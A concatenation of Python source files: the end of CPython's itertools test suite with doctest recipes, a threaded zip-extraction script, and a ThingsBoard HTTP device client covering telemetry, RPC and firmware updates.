self.assertRaises(TypeError, ifilter, isEven, X(s))
self.assertRaises(TypeError, list, ifilter(isEven, N(s)))
self.assertRaises(ZeroDivisionError, list, ifilter(isEven, E(s)))
def test_ifilterfalse(self):
for s in (range(10), range(0), range(1000), (7,11), xrange(2000,2200,5)):
for g in (G, I, Ig, S, L, R):
self.assertEqual(list(ifilterfalse(isEven, g(s))), filter(isOdd, g(s)))
self.assertRaises(TypeError, ifilterfalse, isEven, X(s))
self.assertRaises(TypeError, list, ifilterfalse(isEven, N(s)))
self.assertRaises(ZeroDivisionError, list, ifilterfalse(isEven, E(s)))
def test_izip(self):
for s in ("123", "", range(1000), ('do', 1.2), xrange(2000,2200,5)):
for g in (G, I, Ig, S, L, R):
self.assertEqual(list(izip(g(s))), zip(g(s)))
self.assertEqual(list(izip(g(s), g(s))), zip(g(s), g(s)))
self.assertRaises(TypeError, izip, X(s))
self.assertRaises(TypeError, list, izip(N(s)))
self.assertRaises(ZeroDivisionError, list, izip(E(s)))
def test_iziplongest(self):
for s in ("123", "", range(1000), ('do', 1.2), xrange(2000,2200,5)):
for g in (G, I, Ig, S, L, R):
self.assertEqual(list(izip_longest(g(s))), zip(g(s)))
self.assertEqual(list(izip_longest(g(s), g(s))), zip(g(s), g(s)))
self.assertRaises(TypeError, izip_longest, X(s))
self.assertRaises(TypeError, list, izip_longest(N(s)))
self.assertRaises(ZeroDivisionError, list, izip_longest(E(s)))
def test_imap(self):
for s in (range(10), range(0), range(100), (7,11), xrange(20,50,5)):
for g in (G, I, Ig, S, L, R):
self.assertEqual(list(imap(onearg, g(s))), map(onearg, g(s)))
self.assertEqual(list(imap(operator.pow, g(s), g(s))), map(operator.pow, g(s), g(s)))
self.assertRaises(TypeError, imap, onearg, X(s))
self.assertRaises(TypeError, list, imap(onearg, N(s)))
self.assertRaises(ZeroDivisionError, list, imap(onearg, E(s)))
def test_islice(self):
for s in ("12345", "", range(1000), ('do', 1.2), xrange(2000,2200,5)):
for g in (G, I, Ig, S, L, R):
self.assertEqual(list(islice(g(s),1,None,2)), list(g(s))[1::2])
self.assertRaises(TypeError, islice, X(s), 10)
self.assertRaises(TypeError, list, islice(N(s), 10))
self.assertRaises(ZeroDivisionError, list, islice(E(s), 10))
def test_starmap(self):
for s in (range(10), range(0), range(100), (7,11), xrange(20,50,5)):
for g in (G, I, Ig, S, L, R):
ss = zip(s, s)
self.assertEqual(list(starmap(operator.pow, g(ss))), map(operator.pow, g(s), g(s)))
self.assertRaises(TypeError, starmap, operator.pow, X(ss))
self.assertRaises(TypeError, list, starmap(operator.pow, N(ss)))
self.assertRaises(ZeroDivisionError, list, starmap(operator.pow, E(ss)))
def test_takewhile(self):
for s in (range(10), range(0), range(1000), (7,11), xrange(2000,2200,5)):
for g in (G, I, Ig, S, L, R):
tgt = []
for elem in g(s):
if not isEven(elem): break
tgt.append(elem)
self.assertEqual(list(takewhile(isEven, g(s))), tgt)
self.assertRaises(TypeError, takewhile, isEven, X(s))
self.assertRaises(TypeError, list, takewhile(isEven, N(s)))
self.assertRaises(ZeroDivisionError, list, takewhile(isEven, E(s)))
def test_dropwhile(self):
for s in (range(10), range(0), range(1000), (7,11), xrange(2000,2200,5)):
for g in (G, I, Ig, S, L, R):
tgt = []
for elem in g(s):
if not tgt and isOdd(elem): continue
tgt.append(elem)
self.assertEqual(list(dropwhile(isOdd, g(s))), tgt)
self.assertRaises(TypeError, dropwhile, isOdd, X(s))
self.assertRaises(TypeError, list, dropwhile(isOdd, N(s)))
self.assertRaises(ZeroDivisionError, list, dropwhile(isOdd, E(s)))
def test_tee(self):
for s in ("123", "", range(1000), ('do', 1.2), xrange(2000,2200,5)):
for g in (G, I, Ig, S, L, R):
it1, it2 = tee(g(s))
self.assertEqual(list(it1), list(g(s)))
self.assertEqual(list(it2), list(g(s)))
self.assertRaises(TypeError, tee, X(s))
self.assertRaises(TypeError, list, tee(N(s))[0])
self.assertRaises(ZeroDivisionError, list, tee(E(s))[0])
class LengthTransparency(unittest.TestCase):
@test_support.impl_detail("__length_hint__() API is undocumented")
def test_repeat(self):
from test.test_iterlen import len
self.assertEqual(len(repeat(None, 50)), 50)
self.assertRaises(TypeError, len, repeat(None))
class RegressionTests(unittest.TestCase):
def test_sf_793826(self):
# Fix Armin Rigo's successful efforts to wreak havoc
def mutatingtuple(tuple1, f, tuple2):
# this builds a tuple t which is a copy of tuple1,
# then calls f(t), then mutates t to be equal to tuple2
# (needs len(tuple1) == len(tuple2)).
def g(value, first=[1]):
if first:
del first[:]
f(z.next())
return value
items = list(tuple2)
items[1:1] = list(tuple1)
gen = imap(g, items)
z = izip(*[gen]*len(tuple1))
z.next()
def f(t):
global T
T = t
first[:] = list(T)
first = []
mutatingtuple((1,2,3), f, (4,5,6))
second = list(T)
self.assertEqual(first, second)
def test_sf_950057(self):
# Make sure that chain() and cycle() catch exceptions immediately
# rather than when shifting between input sources
def gen1():
hist.append(0)
yield 1
hist.append(1)
raise AssertionError
hist.append(2)
def gen2(x):
hist.append(3)
yield 2
hist.append(4)
if x:
raise StopIteration
hist = []
self.assertRaises(AssertionError, list, chain(gen1(), gen2(False)))
self.assertEqual(hist, [0,1])
hist = []
self.assertRaises(AssertionError, list, chain(gen1(), gen2(True)))
self.assertEqual(hist, [0,1])
hist = []
self.assertRaises(AssertionError, list, cycle(gen1()))
self.assertEqual(hist, [0,1])
def test_long_chain_of_empty_iterables(self):
# Make sure itertools.chain doesn't run into recursion limits when
# dealing with long chains of empty iterables. Even with a high
# number this would probably only fail in Py_DEBUG mode.
it = chain.from_iterable(() for unused in xrange(10000000))
with self.assertRaises(StopIteration):
next(it)
def test_issue30347_1(self):
def f(n):
if n == 5:
list(b)
return n != 6
for (k, b) in groupby(range(10), f):
list(b) # shouldn't crash
def test_issue30347_2(self):
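# K.__eq__ advances the active groupby() group from inside a key comparison,
# exercising the re-entrancy that used to crash the C implementation (issue 30347).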
class K(object):
i = 0
def __init__(self, v):
pass
def __eq__(self, other):
K.i += 1
if K.i == 1:
next(g, None)
return True
def __hash__(self):
return 1
g = next(groupby(range(10), K))[1]
for j in range(2):
next(g, None) # shouldn't crash
class SubclassWithKwargsTest(unittest.TestCase):
def test_keywords_in_subclass(self):
# count is not subclassable...
for cls in (repeat, izip, ifilter, ifilterfalse, chain, imap,
starmap, islice, takewhile, dropwhile, cycle, compress):
class Subclass(cls):
def __init__(self, newarg=None, *args):
cls.__init__(self, *args)
try:
Subclass(newarg=1)
except TypeError, err:
# we expect type errors because of wrong argument count
self.assertNotIn("does not take keyword arguments", err.args[0])
libreftest = """ Doctest for examples in the library reference: libitertools.tex
>>> amounts = [120.15, 764.05, 823.14]
>>> for checknum, amount in izip(count(1200), amounts):
... print 'Check %d is for $%.2f' % (checknum, amount)
...
Check 1200 is for $120.15
Check 1201 is for $764.05
Check 1202 is for $823.14
>>> import operator
>>> for cube in imap(operator.pow, xrange(1,4), repeat(3)):
... print cube
...
1
8
27
>>> reportlines = ['EuroPython', 'Roster', '', 'alex', '', 'laura', '', 'martin', '', 'walter', '', 'samuele']
>>> for name in islice(reportlines, 3, None, 2):
... print name.title()
...
Alex
Laura
Martin
Walter
Samuele
>>> from operator import itemgetter
>>> d = dict(a=1, b=2, c=1, d=2, e=1, f=2, g=3)
>>> di = sorted(sorted(d.iteritems()), key=itemgetter(1))
>>> for k, g in groupby(di, itemgetter(1)):
... print k, map(itemgetter(0), g)
...
1 ['a', 'c', 'e']
2 ['b', 'd', 'f']
3 ['g']
# Find runs of consecutive numbers using groupby. The key to the solution
# is differencing with a range so that consecutive numbers all appear in
# the same group.
>>> data = [ 1, 4,5,6, 10, 15,16,17,18, 22, 25,26,27,28]
>>> for k, g in groupby(enumerate(data), lambda t:t[0]-t[1]):
... print map(operator.itemgetter(1), g)
...
[1]
[4, 5, 6]
[10]
[15, 16, 17, 18]
[22]
[25, 26, 27, 28]
>>> def take(n, iterable):
... "Return first n items of the iterable as a list"
... return list(islice(iterable, n))
>>> def enumerate(iterable, start=0):
... return izip(count(start), iterable)
>>> def tabulate(function, start=0):
... "Return function(0), function(1), ..."
... return imap(function, count(start))
>>> import collections
>>> def consume(iterator, n=None):
... "Advance the iterator n-steps ahead. If n is None, consume entirely."
... # Use functions that consume iterators at C speed.
... if n is None:
... # feed the entire iterator into a zero-length deque
... collections.deque(iterator, maxlen=0)
... else:
... # advance to the empty slice starting at position n
... next(islice(iterator, n, n), None)
>>> def nth(iterable, n, default=None):
... "Returns the nth item or a default value"
... return next(islice(iterable, n, None), default)
>>> def all_equal(iterable):
... "Returns True if all the elements are equal to each other"
... g = groupby(iterable)
... return next(g, True) and not next(g, False)
>>> def quantify(iterable, pred=bool):
... "Count how many times the predicate is true"
... return sum(imap(pred, iterable))
>>> def padnone(iterable):
... "Returns the sequence elements and then returns None indefinitely"
... return chain(iterable, repeat(None))
>>> def ncycles(iterable, n):
... "Returns the sequence elements n times"
... return chain(*repeat(iterable, n))
>>> def dotproduct(vec1, vec2):
... return sum(imap(operator.mul, vec1, vec2))
>>> def flatten(listOfLists):
... return list(chain.from_iterable(listOfLists))
>>> def repeatfunc(func, times=None, *args):
... "Repeat calls to func with specified arguments."
... " Example: repeatfunc(random.random)"
... if times is None:
... return starmap(func, repeat(args))
... else:
... return starmap(func, repeat(args, times))
>>> def pairwise(iterable):
... "s -> (s0,s1), (s1,s2), (s2, s3), ..."
... a, b = tee(iterable)
... for elem in b:
... break
... return izip(a, b)
>>> def grouper(n, iterable, fillvalue=None):
... "grouper(3, 'ABCDEFG', 'x') --> ABC DEF Gxx"
... args = [iter(iterable)] * n
... return izip_longest(fillvalue=fillvalue, *args)
>>> def roundrobin(*iterables):
... "roundrobin('ABC', 'D', 'EF') --> A D E B F C"
... # Recipe credited to George Sakkis
... pending = len(iterables)
... nexts = cycle(iter(it).next for it in iterables)
... while pending:
... try:
... for next in nexts:
... yield next()
... except StopIteration:
... pending -= 1
... nexts = cycle(islice(nexts, pending))
>>> def powerset(iterable):
... "powerset([1,2,3]) --> () (1,) (2,) (3,) (1,2) (1,3) (2,3) (1,2,3)"
... s = list(iterable)
... return chain.from_iterable(combinations(s, r) for r in range(len(s)+1))
>>> def unique_everseen(iterable, key=None):
... "List unique elements, preserving order. Remember all elements ever seen."
... # unique_everseen('AAAABBBCCDAABBB') --> A B C D
... # unique_everseen('ABBCcAD', str.lower) --> A B C D
... seen = set()
... seen_add = seen.add
... if key is None:
... for element in iterable:
... if element not in seen:
... seen_add(element)
... yield element
... else:
... for element in iterable:
... k = key(element)
... if k not in seen:
... seen_add(k)
... yield element
>>> def unique_justseen(iterable, key=None):
... "List unique elements, preserving order. Remember only the element just seen."
... # unique_justseen('AAAABBBCCDAABBB') --> A B C D A B
... # unique_justseen('ABBCcAD', str.lower) --> A B C A D
... return imap(next, imap(itemgetter(1), groupby(iterable, key)))
This is not part of the examples but it tests to make sure the definitions
perform as purported.
>>> take(10, count())
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
>>> list(enumerate('abc'))
[(0, 'a'), (1, 'b'), (2, 'c')]
>>> list(islice(tabulate(lambda x: 2*x), 4))
[0, 2, 4, 6]
>>> it = iter(xrange(10))
>>> consume(it, 3)
>>> next(it)
3
>>> consume(it)
>>> next(it, 'Done')
'Done'
>>> nth('abcde', 3)
'd'
>>> nth('abcde', 9) is None
True
>>> [all_equal(s) for s in ('', 'A', 'AAAA', 'AAAB', 'AAABA')]
[True, True, True, False, False]
>>> quantify(xrange(99), lambda x: x%2==0)
50
>>> a = [[1, 2, 3], [4, 5, 6]]
>>> flatten(a)
[1, 2, 3, 4, 5, 6]
>>> list(repeatfunc(pow, 5, 2, 3))
[8, 8, 8, 8, 8]
>>> import random
>>> take(5, imap(int, repeatfunc(random.random)))
[0, 0, 0, 0, 0]
>>> list(pairwise('abcd'))
[('a', 'b'), ('b', 'c'), ('c', 'd')]
>>> list(pairwise([]))
[]
>>> list(pairwise('a'))
[]
>>> list(islice(padnone('abc'), 0, 6))
['a', 'b', 'c', None, None, None]
>>> list(ncycles('abc', 3))
['a', 'b', 'c', 'a', 'b', 'c', 'a', 'b', 'c']
>>> dotproduct([1,2,3], [4,5,6])
32
>>> list(grouper(3, 'abcdefg', 'x'))
[('a', 'b', 'c'), ('d', 'e', 'f'), ('g', 'x', 'x')]
>>> list(roundrobin('abc', 'd', 'ef'))
['a', 'd', 'e', 'b', 'f', 'c']
>>> list(powerset([1,2,3]))
[(), (1,), (2,), (3,), (1, 2), (1, 3), (2, 3), (1, 2, 3)]
>>> all(len(list(powerset(range(n)))) == 2**n for n in range(18))
True
>>> list(powerset('abcde')) == sorted(sorted(set(powerset('abcde'))), key=len)
True
>>> list(unique_everseen('AAAABBBCCDAABBB'))
['A', 'B', 'C', 'D']
>>> list(unique_everseen('ABBCcAD', str.lower))
['A', 'B', 'C', 'D']
>>> list(unique_justseen('AAAABBBCCDAABBB'))
['A', 'B', 'C', 'D', 'A', 'B']
>>> list(unique_justseen('ABBCcAD', str.lower))
['A', 'B', 'C', 'A', 'D']
"""
__test__ = {'libreftest' : libreftest}
def test_main(verbose=None):
test_classes = (TestBasicOps, TestVariousIteratorArgs, TestGC,
RegressionTests, LengthTransparency,
SubclassWithKwargsTest, TestExamples,
TestPurePythonRoughEquivalents)
test_support.run_unittest(*test_classes)
# verify reference counting
if verbose and hasattr(sys, "gettotalrefcount"):
import gc
counts = [None] * 5
for i in xrange(len(counts)):
test_support.run_unittest(*test_classes)
gc.collect()
counts[i] = sys.gettotalrefcount()
print counts
# doctest the examples in the library reference
test_support.run_doctest(sys.modules[__name__], verbose)
if __name__ == "__main__":
test_main(verbose=True)
|
unzip.py
|
import os
import threading
import time
import zipfile
from src import UNZIPED_FOLDER_NAME
from src.io.get_files_dict import main as get_files_dict
from src.io.utils import create_folder, check_if_folder_is_empty, display_progress
dict_status = {}
chunk_size = 1024 * 1024 * 2
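# dict_status maps each archive member name to its progress bookkeeping (bytes
# written, total size, percentage, speed, ETA); chunk_size is how many bytes
# are read per iteration while extracting (2 MiB).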
def main(folder_to_unzip=None): # pragma: no cover
dict_files_dict = get_files_dict()
folder_to_unzip = folder_to_unzip or dict_files_dict['folder_ref_date_save_zip']
started_at = time.time()
is_empty = check_if_folder_is_empty(folder_to_unzip)
if is_empty:
print('Folder is empty, nothing to unzip; exiting.')
return False
folder_ref_date_save_zip = dict_files_dict['folder_ref_date_save_zip']
files_folder_ref_date_save_zip = [os.path.join(folder_ref_date_save_zip, file) for file in
os.listdir(folder_ref_date_save_zip)]
files_folder_ref_date_save_zip = [file for file in files_folder_ref_date_save_zip if file.endswith('.zip')]
folder_ref_date_save_unziped = os.path.join(folder_ref_date_save_zip, UNZIPED_FOLDER_NAME)
create_folder(folder_ref_date_save_unziped)
list_threads = []
for file in files_folder_ref_date_save_zip:
t = threading.Thread(target=unzip_file, args=(file, folder_ref_date_save_unziped, started_at))
t.start()
list_threads.append(t)
for t in list_threads:
t.join()
def unzip_file(file, folder_ref_date_save_unziped, started_at): # pragma: no cover
with zipfile.ZipFile(file, 'r') as zip_ref:
for file_name in zip_ref.namelist():
file_size_bytes = zip_ref.getinfo(file_name).file_size
file_target = os.path.join(folder_ref_date_save_unziped, file_name)
with open(file_target, 'wb') as outfile:
member_fd = zip_ref.open(file_name)
current_file_unziped_bytes = 0
while True:
x = member_fd.read(chunk_size)
if not x:
break
current_file_unziped_bytes += outfile.write(x)
running_time_seconds = time.time() - started_at
speed = current_file_unziped_bytes / running_time_seconds if running_time_seconds > 0 else 0
eta = (file_size_bytes - current_file_unziped_bytes) / speed if speed > 0 else 0
global dict_status
dict_status[file_name] = {'total_completed_bytes': current_file_unziped_bytes,
'file_size_bytes': file_size_bytes,
'pct_downloaded': current_file_unziped_bytes / file_size_bytes,
'started_at': started_at,
'running_time_seconds': running_time_seconds,
'speed': speed,
'eta': eta,
}
display_progress(dict_status, started_at=started_at, source='Unzip', th_to_display=0.01)
if __name__ == '__main__':
main()
|
tb_device_http.py
|
"""ThingsBoard HTTP API device module."""
import threading
import logging
import queue
import time
import typing
from datetime import datetime, timezone
from sdk_utils import verify_checksum
import requests
from math import ceil
FW_CHECKSUM_ATTR = "fw_checksum"
FW_CHECKSUM_ALG_ATTR = "fw_checksum_algorithm"
FW_SIZE_ATTR = "fw_size"
FW_TITLE_ATTR = "fw_title"
FW_VERSION_ATTR = "fw_version"
FW_STATE_ATTR = "fw_state"
REQUIRED_SHARED_KEYS = [FW_CHECKSUM_ATTR, FW_CHECKSUM_ALG_ATTR, FW_SIZE_ATTR, FW_TITLE_ATTR, FW_VERSION_ATTR]
class TBHTTPAPIException(Exception):
"""ThingsBoard HTTP Device API Exception class."""
class TBProvisionFailure(TBHTTPAPIException):
"""Exception raised if device provisioning failed."""
class TBHTTPDevice:
"""ThingsBoard HTTP Device API class.
:param host: The ThingsBoard hostname.
:param token: The device token.
:param name: A name for this device. The name is only set locally.
"""
def __init__(self, host: str, token: str, name: str = None, chunk_size: int = 0):
self.__session = requests.Session()
self.__session.headers.update({'Content-Type': 'application/json'})
self.__config = {
'host': host, 'token': token, 'name': name, 'timeout': 30
}
self.__worker = {
'publish': {
'queue': queue.Queue(),
'thread': threading.Thread(target=self.__publish_worker, daemon=True),
'stop_event': threading.Event()
},
'attributes': {
'thread': threading.Thread(target=self.__subscription_worker,
daemon=True,
kwargs={'endpoint': 'attributes'}),
'stop_event': threading.Event(),
},
'rpc': {
'thread': threading.Thread(target=self.__subscription_worker,
daemon=True,
kwargs={'endpoint': 'rpc'}),
'stop_event': threading.Event(),
}
}
self.current_firmware_info = {
"current_fw_title": None,
"current_fw_version": None
}
self.chunk_size = chunk_size
def __repr__(self):
return f'<ThingsBoard ({self.host}) HTTP device {self.name}>'
@property
def host(self) -> str:
"""Get the ThingsBoard hostname."""
return self.__config['host']
@property
def name(self) -> str:
"""Get the device name."""
return self.__config['name']
@property
def timeout(self) -> int:
"""Get the connection timeout."""
return self.__config['timeout']
@property
def api_base_url(self) -> str:
"""Get the ThingsBoard API base URL."""
return f'{self.host}/api/v1/{self.token}'
@property
def token(self) -> str:
"""Get the device token."""
return self.__config['token']
@property
def logger(self) -> logging.Logger:
"""Get the logger instance."""
return logging.getLogger('TBHTTPDevice')
@property
def log_level(self) -> str:
"""Get the log level."""
levels = {0: 'NOTSET', 10: 'DEBUG', 20: 'INFO', 30: 'WARNING', 40: 'ERROR', 50: 'CRITICAL'}
return levels.get(self.logger.level)
@log_level.setter
def log_level(self, value: typing.Union[int, str]):
self.logger.setLevel(value)
self.logger.critical('Log level set to %s', self.log_level)
def __get_firmware_info(self):
response = self.__session.get(
f"{self.__config['host']}/api/v1/{self.__config['token']}/attributes",
params={"sharedKeys": REQUIRED_SHARED_KEYS}).json()
return response.get("shared", {})
def __get_firmware(self, fw_info):
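# Fetch the firmware image: a single request when chunk_size is 0, otherwise
# one request per chunk_size-byte piece, concatenating the returned bytes.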
chunk_count = ceil(fw_info.get(FW_SIZE_ATTR, 0) / self.chunk_size) if self.chunk_size > 0 else 0
firmware_data = b''
for chunk_number in range(chunk_count + 1):
params = {"title": fw_info.get(FW_TITLE_ATTR),
"version": fw_info.get(FW_VERSION_ATTR),
"size": self.chunk_size if self.chunk_size < fw_info.get(FW_SIZE_ATTR,
0) else fw_info.get(
FW_SIZE_ATTR, 0),
"chunk": chunk_number
}
self.logger.debug(params)
self.logger.debug('Getting chunk number %s. Chunk size is %r byte(s).', chunk_number + 1, self.chunk_size)
response = self.__session.get(
f"{self.__config['host']}/api/v1/{self.__config['token']}/firmware",
params=params)
if response.status_code != 200:
self.logger.error('Received HTTP error %s while fetching firmware chunk', response.status_code)
response.raise_for_status()
return
firmware_data = firmware_data + response.content
return firmware_data
def __on_firmware_received(self, firmware_info, firmware_data):
with open(firmware_info.get(FW_TITLE_ATTR), "wb") as firmware_file:
firmware_file.write(firmware_data)
self.logger.info('Firmware is updated!\n Current firmware version is: %s' % firmware_info.get(FW_VERSION_ATTR))
def get_firmware_update(self):
self.send_telemetry(self.current_firmware_info)
self.logger.info('Getting firmware info from %s' % self.__config['host'])
firmware_info = self.__get_firmware_info()
if (firmware_info.get(FW_VERSION_ATTR) is not None and firmware_info.get(
FW_VERSION_ATTR) != self.current_firmware_info.get("current_" + FW_VERSION_ATTR)) \
or (firmware_info.get(FW_TITLE_ATTR) is not None and firmware_info.get(
FW_TITLE_ATTR) != self.current_firmware_info.get("current_" + FW_TITLE_ATTR)):
self.logger.info('New firmware available!')
self.current_firmware_info[FW_STATE_ATTR] = "DOWNLOADING"
time.sleep(1)
self.send_telemetry(self.current_firmware_info)
firmware_data = self.__get_firmware(firmware_info)
self.current_firmware_info[FW_STATE_ATTR] = "DOWNLOADED"
time.sleep(1)
self.send_telemetry(self.current_firmware_info)
verification_result = verify_checksum(firmware_data, firmware_info.get(FW_CHECKSUM_ALG_ATTR),
firmware_info.get(FW_CHECKSUM_ATTR))
if verification_result:
self.logger.debug('Checksum verified!')
self.current_firmware_info[FW_STATE_ATTR] = "VERIFIED"
time.sleep(1)
self.send_telemetry(self.current_firmware_info)
else:
self.logger.debug('Checksum verification failed!')
self.current_firmware_info[FW_STATE_ATTR] = "FAILED"
time.sleep(1)
self.send_telemetry(self.current_firmware_info)
firmware_data = self.__get_firmware(firmware_info)
return
self.current_firmware_info[FW_STATE_ATTR] = "UPDATING"
time.sleep(1)
self.send_telemetry(self.current_firmware_info)
self.__on_firmware_received(firmware_info, firmware_data)
current_firmware_info = {
"current_" + FW_TITLE_ATTR: firmware_info.get(FW_TITLE_ATTR),
"current_" + FW_VERSION_ATTR: firmware_info.get(FW_VERSION_ATTR),
FW_STATE_ATTR: "UPDATED"
}
time.sleep(1)
self.send_telemetry(current_firmware_info)
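    # Usage sketch (hypothetical, not part of the original API): a caller can poll for
    # over-the-air updates by invoking get_firmware_update() periodically, e.g.:
    #
    #     device = TBHTTPDevice('https://thingsboard.example.com', 'DEVICE_ACCESS_TOKEN')
    #     while True:
    #         device.get_firmware_update()
    #         time.sleep(30)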
def start_publish_worker(self):
"""Start the publish worker thread."""
self.__worker['publish']['stop_event'].clear()
self.__worker['publish']['thread'].start()
def stop_publish_worker(self):
"""Stop the publish worker thread."""
self.__worker['publish']['stop_event'].set()
def __publish_worker(self):
"""Publish telemetry data from the queue."""
logger = self.logger.getChild('worker.publish')
logger.info('Start publisher thread')
logger.debug('Perform connection test before entering worker loop')
if not self.test_connection():
logger.error('Connection test failed, exit publisher thread')
return
logger.debug('Connection test successful')
        # Run until a stop is requested and all queued messages have been sent.
        while not (self.__worker['publish']['stop_event'].is_set()
                   and self.__worker['publish']['queue'].empty()):
if not self.__worker['publish']['queue'].empty():
try:
task = self.__worker['publish']['queue'].get(timeout=1)
except queue.Empty:
if self.__worker['publish']['stop_event'].is_set():
break
continue
endpoint = task.pop('endpoint')
try:
self._publish_data(task, endpoint)
except Exception as error:
# ToDo: More precise exception catching
logger.error(error)
task.update({'endpoint': endpoint})
self.__worker['publish']['queue'].put(task)
time.sleep(1)
else:
logger.debug('Published %s to %s', task, endpoint)
self.__worker['publish']['queue'].task_done()
time.sleep(.2)
logger.info('Stop publisher thread.')
def test_connection(self) -> bool:
"""Test connection to the API.
:return: True if no errors occurred, False otherwise.
"""
self.logger.debug('Start connection test')
success = False
try:
self._publish_data(data={}, endpoint='telemetry')
except (requests.exceptions.Timeout, requests.exceptions.ConnectionError) as error:
self.logger.debug(error)
except requests.exceptions.HTTPError as error:
self.logger.debug(error)
status_code = error.response.status_code
if status_code == 401:
self.logger.error('Error 401: Unauthorized. Check if token is correct.')
else:
self.logger.error('Error %s', status_code)
else:
self.logger.debug('Connection test successful')
success = True
finally:
self.logger.debug('End connection test')
return success
def connect(self) -> bool:
"""Publish an empty telemetry data to ThingsBoard to test the connection.
:return: True if connected, false otherwise.
"""
if self.test_connection():
self.logger.info('Connected to ThingsBoard')
self.start_publish_worker()
return True
return False
def _publish_data(self, data: dict, endpoint: str, timeout: int = None) -> dict:
"""Send POST data to ThingsBoard.
:param data: The data dictionary to send.
:param endpoint: The receiving API endpoint.
:param timeout: Override the instance timeout for this request.
"""
response = self.__session.post(
url=f'{self.api_base_url}/{endpoint}',
json=data,
timeout=timeout or self.timeout)
response.raise_for_status()
return response.json() if response.content else {}
def _get_data(self, params: dict, endpoint: str, timeout: int = None) -> dict:
"""Retrieve data with GET from ThingsBoard.
:param params: A dictionary with the parameters for the request.
:param endpoint: The receiving API endpoint.
:param timeout: Override the instance timeout for this request.
:return: A dictionary with the response from the ThingsBoard instance.
"""
response = self.__session.get(
url=f'{self.api_base_url}/{endpoint}',
params=params,
timeout=timeout or self.timeout)
response.raise_for_status()
return response.json()
def send_telemetry(self, telemetry: dict, timestamp: datetime = None, queued: bool = True):
"""Publish telemetry to ThingsBoard.
:param telemetry: A dictionary with the telemetry data to send.
:param timestamp: Timestamp to set for the values. If not set the ThingsBoard server uses
the time of reception as timestamp.
        :param queued: Add the telemetry to the queue. If False, the data is sent immediately.
"""
timestamp = datetime.now() if timestamp is None else timestamp
payload = {
'ts': int(timestamp.replace(tzinfo=timezone.utc).timestamp() * 1000),
'values': telemetry,
}
if queued:
payload.update({'endpoint': 'telemetry'})
self.__worker['publish']['queue'].put(payload)
else:
self._publish_data(payload, 'telemetry')
def send_attributes(self, attributes: dict):
"""Send attributes to ThingsBoard.
:param attributes: Attributes to send.
"""
self._publish_data(attributes, 'attributes')
def send_rpc(self, name: str, params: dict = None, rpc_id: int = None) -> dict:
"""Send RPC to ThingsBoard and return response.
:param name: Name of the RPC method.
:param params: Parameter for the RPC.
:param rpc_id: Specify an Id for this RPC.
:return: A dictionary with the response.
"""
endpoint = f'rpc/{rpc_id}' if rpc_id else 'rpc'
return self._publish_data({'method': name, 'params': params or {}}, endpoint)
def request_attributes(self, client_keys: list = None, shared_keys: list = None) -> dict:
"""Request attributes from ThingsBoard.
:param client_keys: A list of keys for client attributes.
:param shared_keys: A list of keys for shared attributes.
        :return: A dictionary with the requested attributes.
"""
        # The ThingsBoard HTTP API expects camelCase, comma-separated key lists.
        params = {'clientKeys': ','.join(client_keys) if client_keys else None,
                  'sharedKeys': ','.join(shared_keys) if shared_keys else None}
return self._get_data(params=params, endpoint='attributes')
def __subscription_worker(self, endpoint: str, timeout: int = None):
"""Worker thread for subscription to HTTP API endpoints.
:param endpoint: The endpoint name.
:param timeout: Timeout value in seconds.
"""
logger = self.logger.getChild(f'worker.subscription.{endpoint}')
stop_event = self.__worker[endpoint]['stop_event']
logger.info('Start subscription to %s updates', endpoint)
if not self.__worker[endpoint].get('callback'):
logger.warning('No callback set for %s subscription', endpoint)
stop_event.set()
callback = self.__worker[endpoint].get('callback', lambda data: None)
params = {
'timeout': (timeout or self.timeout) * 1000
}
url = {
'attributes': f'{self.api_base_url}/attributes/updates',
'rpc': f'{self.api_base_url}/rpc'
}
logger.debug('Timeout set to %ss', params['timeout'] / 1000)
while not stop_event.is_set():
            # The long-poll timeout sent to ThingsBoard is in milliseconds, while the
            # requests timeout is in seconds; allow a small buffer for the response.
            response = self.__session.get(url=url[endpoint],
                                          params=params,
                                          timeout=(timeout or self.timeout) + 5)
if stop_event.is_set():
break
if response.status_code == 408: # Request timeout
continue
if response.status_code == 504: # Gateway Timeout
continue # Reconnect
response.raise_for_status()
callback(response.json())
time.sleep(.1)
stop_event.clear()
logger.info('Stop subscription to %s updates', endpoint)
def subscribe(self, endpoint: str, callback: typing.Callable[[dict], None] = None):
"""Subscribe to updates from a given endpoint.
:param endpoint: The endpoint to subscribe.
:param callback: Callback to execute on an update. Takes a dict as only argument.
"""
        if endpoint not in ['attributes', 'rpc']:
            raise ValueError(f'Unsupported endpoint for subscription: {endpoint}')
        if callback:
            if not callable(callback):
                raise TypeError('callback must be callable')
self.__worker[endpoint]['callback'] = callback
self.__worker[endpoint]['stop_event'].clear()
self.__worker[endpoint]['thread'].start()
def unsubscribe(self, endpoint: str):
"""Unsubscribe from a given endpoint.
:param endpoint: The endpoint to unsubscribe.
"""
        if endpoint not in ['attributes', 'rpc']:
            raise ValueError(f'Unsupported endpoint for subscription: {endpoint}')
self.logger.debug('Set stop event for %s subscription', endpoint)
self.__worker[endpoint]['stop_event'].set()
@classmethod
def provision(cls, host: str, device_name: str, device_key: str, device_secret: str):
"""Initiate device provisioning and return a device instance.
:param host: The root URL to the ThingsBoard instance.
:param device_name: Name of the device to provision.
:param device_key: Provisioning device key from ThingsBoard.
:param device_secret: Provisioning secret from ThingsBoard.
        :return: Instance of :class:`TBHTTPDevice`
"""
data = {
'deviceName': device_name,
'provisionDeviceKey': device_key,
'provisionDeviceSecret': device_secret
}
response = requests.post(f'{host}/api/v1/provision', json=data)
response.raise_for_status()
device = response.json()
if device['status'] == 'SUCCESS' and device['credentialsType'] == 'ACCESS_TOKEN':
return cls(host=host, token=device['credentialsValue'], name=device_name)
raise TBProvisionFailure(device)
class TBHTTPClient(TBHTTPDevice):
"""Legacy class name."""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.logger.critical('TBHTTPClient class is deprecated, please use TBHTTPDevice')
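# ---------------------------------------------------------------------------
# Minimal usage sketch (illustrative only): the host, token and telemetry
# values below are hypothetical placeholders, not part of the library itself.
# ---------------------------------------------------------------------------
if __name__ == '__main__':
    device = TBHTTPDevice(host='https://thingsboard.example.com',
                          token='DEVICE_ACCESS_TOKEN',
                          name='demo-device')
    device.log_level = 'DEBUG'
    if device.connect():
        # Queued publish, handled by the background publish worker thread.
        device.send_telemetry({'temperature': 22.5})
        # Direct, synchronous publish of client-side attributes.
        device.send_attributes({'firmware_state': 'IDLE'})
        device.stop_publish_worker()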
|
main.py
|
from __future__ import print_function, division
import os
